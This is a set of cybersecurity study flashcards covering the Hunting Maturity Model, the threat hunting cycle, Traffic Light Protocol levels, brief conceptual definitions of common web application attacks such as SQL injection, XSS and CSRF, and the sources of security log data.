Section 4 Flashcards

1
Q

What does HMM?

A

Hunting Maturity Model

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What are the 5 levels in the HMM model?

A
HM0 (Least Proactive)
HM1
HM2
HM3
HM4 (Most Proactive)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is happening at HM0 level?

A

Only collecting IDS alerts and as such is a reactive model.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What is happening at HM1 level?

A

Collecting IDS alerts but also collecting logs from other systems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What is happening at HM2 level?

A

Mostly perform active, rather than reactive, hunt operations at this level.
Collecting large amounts of data.
Use External sources into their own hunt operations.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What is happening at HM3 level?

A

Do not rely on external sources
Usually, push such information out
Using machine learning to see beyond the alert.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What is happening at HM4 level?

A

Highest level
automate many tactical level analysis
scripts or programs can be written that are based on intelligence and hunt procedures

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What is the Threat Hunting Cycle?

A

Hypothesis
Investigation
Uncover
Inform and enrich

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What happens in the Hypothesis stage of the Threat Hunting Cycle?

A
The: 
Who
What
Where
How
Are there Vulnerable systems
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

What happens in the Investigation stage of the Threat Hunting Cycle?

A

Checking security system logs
Querying datasets
Use of machine learning to help find malicious code

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

What happens in the Uncover stage of the Threat Hunting Cycle?

A
Identify IOCs (Indicator of compromise)
TTP = Tactics, Techniques and procedures
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

What happens in the Inform and enrich stage of the Threat Hunting Cycle?

A

Lessons learnt

Support documentation of previous steps

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What is the Hot Threat Dashboard?

A

It is used by SOCs to investigate the top 15 vulnerabilities in the network.
Must have a CVSS score of 7.0 or higher to make it onto the top threat dashboard.
After 30 days old vulnerabilities are moved off the list and into the database.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What is TLP?

A

Traffic Light Protocol

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

In the Traffic Light Protocol, what are the different levels?

A

Red
Amber
Green
White

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What can be disclosed at TLP Red level?

A

Not for disclosure, restricted to participants only

17
Q

What can be disclosed at TLP Amber level?

A

Limited disclosure, restricted to participants organizations only.

18
Q

What can be disclosed at TLP Green level?

A

Limited disclosure, restricted to the community

19
Q

What can be disclosed at TLP White level?

A

Disclosure not limited

20
Q

What is an injection attack?

A

SQL injection attack is when an attacker adds SQL statements to an online form in the hope that it will retrieve secure information, add or delete from the database, crash the database. Validating user input before passing it to the database can stop this attack

21
Q

What is broken authentication & session management?

A

An attacker takes advantage of a failure to properly expire sessions and to tie a session to an individual.

22
Q

What is Cross-site scripting (XSS) attack?

A

Poor input validation which allows an attacker to run malicious code in a users browser which might display a message or steal a users cookies.

23
Q

What is insecure direct object reference attack?

A

An attacker changing the ID in a web address from the current user to a different user and getting the information on that user. This shows a lack of authentication.

24
Q

What is security misconfiguration attack?

A

An attacker takes advantage of improper configurations of any part of the application stack, including web servers, databases, or application code.

25
Q

What is sensitive data exposure attack?

A

An attacker takes advantage of a failure to properly secure sensitive data. Sending data in plaintext, using weak encryption keys, compromised encryption algorithm.

26
Q

What is missing function level access control?

A

When an admin fails to properly authenticate access to restricted sections of a site.

27
Q

What is Cross-site request forgery?

A

An attacker takes advantage of a failure to ensure that each request was properly originated by a user.

28
Q

What is using components with known vulnerabilities attack?

A

An attacker takes advantage of a failure to properly patch or update software, creating an attack surface.

29
Q

What are invalidated redirects and forwards?

A

An attacker takes advantage of a scripts forwarding and redirection features to present the illusion of browsing to a trusted site, only to be forwarded to a malicious one.

30
Q

Examples of devices that produce Transaction Data?

A

DHCP Servers
DNS Servers
Proxy Servers

31
Q

Examples of devices that produce Alert Data?

A

AAA Server

IPS devices

32
Q

Examples of devices that produce Session Data?

A

Netflow

Firewall